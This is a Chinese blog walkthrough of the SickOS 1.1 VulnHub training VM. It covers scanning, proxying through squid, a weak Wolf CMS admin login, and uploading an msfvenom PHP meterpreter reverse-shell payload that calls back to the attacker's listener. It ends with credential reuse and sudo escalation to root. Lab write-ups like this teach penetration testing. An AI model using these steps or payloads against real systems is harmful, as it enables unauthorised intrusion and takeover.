Vulnhub系列:SickOS1.1

最新推荐文章于 2024-05-17 22:32:20 发布
最新推荐文章于 2024-05-17 22:32:20 发布
阅读量406 收藏 1
点赞数 3
分类专栏: 渗透项目 文章标签: web安全 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43938645/article/details/129338699
版权

靶机地址:SickOS1.1

渗透思路:

  1. 信息收集

对于目标靶机进行扫描,可以利用nmap或arp-scan -l进行查询,查询到靶机后,探测其开放的端口,常见的端口21、22、80、3306、445等等,对于不同的端口进行不同的渗透考虑。如果有web端,下一步就是对web服务进行信息收集。

  1. web探测

web端进行探测,探测出常见的web漏洞,如弱口令、sql注入、文件上传、文件包含等漏洞,对目录进行爆破等等,这里可以使用到dirsearch或dirb进行目录爆破,可以利用wpscan进行对应wordpress CMS框架进行漏洞检测,也可使用nikto进行web端漏洞检测。

  1. web渗透

探测出漏洞后,在本地寻找相关exp进行漏洞利用,getshell等操作,有时也需要自己去构造相应的payload进行渗透。

  1. 提权

在getshell之后,往往都是低权限,能做的事情很少,故而需要找到服务器上可以提权的地方,常用的方式是收集服务器信息,看是否存在内核提权,或者就是本地的SUID的提权,再或者就是利用sudo -l去查看是否存在某些特定用户拥有root权限等

渗透过程:

kali本机ip为:192.168.56.104,对靶机地址的探测:arp-scan -l或使用nmap -sP 192.168.56.1/24

对端口进行探测:nmap -sS -sV -A -T5 192.168.56.122(靶机ip)

这边探测出,靶机存在22、3128、8080端口,其中3128的信息告诉我们这边进行代理,然后我们用nikto web扫描器对靶机进行扫描探测

发现了web端的PHP版本,目录下存在robots.txt,还发现了存在shellshock的漏洞,下面,设置代理,进行web访问

访问后发现什么都没有,利用插件发现了该网站是wolfcms框架,上网查了该框架的默认后台路径

192.168.56.122/wolfcms/?/admin

admin/admin弱口令进入了

之后浏览该页面有上传文件的按钮,这边就想到了文件上传漏洞

利用msfvenom 生成一个php的shell,命令为:

msfvenom -p php/meterpreter/reverse_tcp lhost=(kali ip) lport=4567(监听的端口) -f raw

生成好后将其复制到本地文件,署名php,然后在web端点击按钮进行文件上传

然后在kali开启msf,设置监听,在网页端访问上传的文件,则会反弹回一个shell

然后查看服务器是否安装python,利用which python或where python输入

python -c 'import pty;pty.spawn("/bin/bash")'

转变一个交互式shell,然后就是提权了。

尝试使用sudo -l查看,发现没有什么信息

下面就尝试linux信息收集,进行内核提权,发现了linux 3.11.0,ubuntu 12.04,这些信息可以先放到一边,看看有没有其他的信息

在进入这个web服务的目录后发现了config.php文件,一般这样的文件都存在用户名和密码,查看后发现数据库用户和密码

进行一番搜查后,也没什么有用的信息

想着看能不能利用这个密码进行root转换,输入后发现授权失败,查看后才得知,sickos是第一用户名,那就直接切换到sickos用户下

本以为提权成功,发现还是不对,于是再进行一波该用户的权限收集,发现存在个(All:All)

那就直接不客气,直接sudo -s,切换为root权限,进入root目录查看到flag

本次vulnhub的sickos1.1靶机渗透就结束了,后续会更新更多vulnhub靶机的渗透内容

Ays.Ie
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.1 SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 ...
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
「红队笔记」靶机精讲:SickOS1.1 - 穿越Squid代理的CMS渗透
m0_73612768的博客
11-29 1213
本文是作者在观看B站《红队笔记》后做的一些笔记以及相关知识的补充。靶机精讲之SickOS1.1,vulnhub靶机,需要配置代理,穿越Squid实现对CMS渗透,完整的攻击链,对基本功要求比较高,不难,但也需要全局观和细节操作。能顺利完成本机渗透,也证明你在不断进步。此为方法一,本机还有全然不同的第二种打法。
红队打靶:SickOS1.1详细打靶思路(vulnhub
Bossfrank的博客
06-07 1341
本文是vulnhub靶机sickos详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
红队靶场之SickOS1.1复现过程,反弹shell,目录扫描代理转移
最新发布
m0_58116751的博客
05-17 1778
它的默认登录页面是存在没有被更改,在渗透测试中想要进入后台,分三种,一是猜测尝试弱密码,一种就是字典爆破他的密码,然后就是在网页信息中去查找弄出他的密码,emmm,运气比较好尝试一下,admin,admin。也是列举出了他的很多账号,我们看到了 root sickos 还有当前用户www-data这几个重点用户,我们现在有密码有用户,登录凭证的条件都有了,根据大多人的习惯密码都是相同的那我们来尝试ssh连接吧。我们起手依旧是对于整个网段进行一个扫描,产看整个网段的存活情况来和IP端口的开放情况,
SICKOS: 1.1(内含两种解法)
Mysmycbx的博客
03-18 636
但是通过阅读博客,没有啥信息,web上也不到默认用户和密码。扫3128,也扫不到任何东西,那就把3128做代理扫描80端口,扫描到几个文件,一一查看。发现可以编辑php代码,直接写入反弹shell,go。写入,保存,监听,访问,一气呵成。没扫到啥有用的信息,但是博客肯定有后台呀,这里没有搜到,去网上去搜搜。原来是定时执行connect.py文件,那就构造个反弹shell,写入文件中。通过阅读web目录下的文件,发现了数据库连接文件,发现到一个密码。通过搜索,发现3128端口是负责代理的。
红队打靶:SickOS1.1详细打靶思路之shellshock漏洞利用(vulnhub
Bossfrank的博客
06-08 632
本文详述了vulnhub靶机sickOS1.1的打靶过程。本文利用了bash漏洞shellshock获取初始立足点,并使用定时任务进行提权。不同于单纯的writeup,本文更注重打靶每一步的思路用意。本文涉及的知识点包括nikto扫描、shellshock漏洞利用、msfvenom生成payload、定时任务提权等。采用squid代理分析+web渗透cms后台获取root权限的思路详见我的上一篇博客。
红队笔记3-SickOS1.1打靶流程解法1-穿越Squid代理的CMS渗透(vulnhub
qq_63442530的博客
03-15 1101
1.端口扫描:发现存活端口:22 ,3128(squid-http) ,8080,其中squid-http是个代理服务器2.开始访问3128,8080都访问不到,目录扫描也扫描不出结果,根据我们知道squid是个代理服务器,尝试Dirb -p参数,挂代理目录爆破,成功扫出来一些路径。然后浏览器设置代理访问,找到了wolfcms的页面。3.通过浏览器获得wolfcms后台路径,通过弱口令登录后台,寻找后台代码执行和文件上传的位置,构造反弹命令写入代码执行,反弹shell。
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
VulnHub靶机-SickOs1.1
Slow_的博客
02-22 767
VulnHub靶机-SickOs1.1 下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 下载靶机后在VMware Workstation下打开,网卡配置为桥接 任务:提权并获取flag 攻击机:kali linux 192.168.8.195 靶机:192.168.8.194 文章目录VulnHub靶机-SickOs1.1一、信息搜集二、Getshell三、提权 一、信息搜集 nmap探测存活主机,找到目标靶机 命令:nmap -sP 192.168.
Vulnhub靶机SickOs1.1渗透
xingjinhao123的博客
02-26 311
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 目标是获取root目录下的a0216ea4d51874464078c618298b1367.txt文件 发布日期是2015年11月 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.76 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取靶机IP地址 扫描端口,没有发现熟悉的80端口 使用nikto简单扫一下312
Vulnhub-靶机-SickOs 1.2
qq_43264813的博客
03-05 296
Vulnhub—靶机—SickOs 1.2 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub—靶机—SickOs 1.2一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -T4 -sV -p- 192.168.43.54 【步骤三】尝试22端口弱口令
vulnhub靶场渗透之SickOs1.2渗透教程(超级详细)
旺仔Sec&blog
05-30 1917
靶机下载链接作者D4rk发布日期2016年4月27日难度中等这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限1、这个靶场主要考察的是支持http协议,PUT方法等2、然后就是使用多种反弹shell的方法,不过就是这里设置了规则反弹shell的端口3、最后就是靶机的提权,多多浏览靶机内的可疑文件,结合exp库来实现最终提权的目的。
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1876
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
SickOs1.1
m0_66299232的博客
09-23 1066
其后台入口是http://192.168.166.129/wolfcms/?nmap -p- -A -T4 -sV 192.168.166.129 //探测目标靶机开放端口和相应服务情况。6.使用weevely连接木马,因为url需要代理才可以访问,这里需要现在环境变量中配置代理。上传成功,下一步用weevely来连接,连接的时候后面一定也要带cmd 这是密码。7.连接成功后在网站目录下发现config.php文件,发现数据库密码。cmd是密码 /root/weiqin.php 是路径。
红队渗透靶场之SickOs1.1
xf555er的博客
12-06 1060
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
VulnHub-SickOs1.1
热门推荐
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
12-vulnhub-SickOs 1.1
尼德霍格007
08-03 391
vulnhub-SickOs 1.1 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-8-2 一、信息收集 扫描目标主机ip地址 nmap -sP 192.168.21.0/24 可以看到靶机ip地址是192.168…21.148,192.168.21.128是kali攻击机的ip地址 接下来扫描开放的端口 nmap -A -p 1-64000 192.168.
Vulnhub靶机:SICKOS_ 1.1
LainWith的博客
12-09 665
SickOs(此系列共2台)发布日期:2015年12月11日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描代理扫描搜寻网站后台后台写入shell计划任务提权破壳漏洞拿shell。
vulnhub靶机系列
09-09
3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值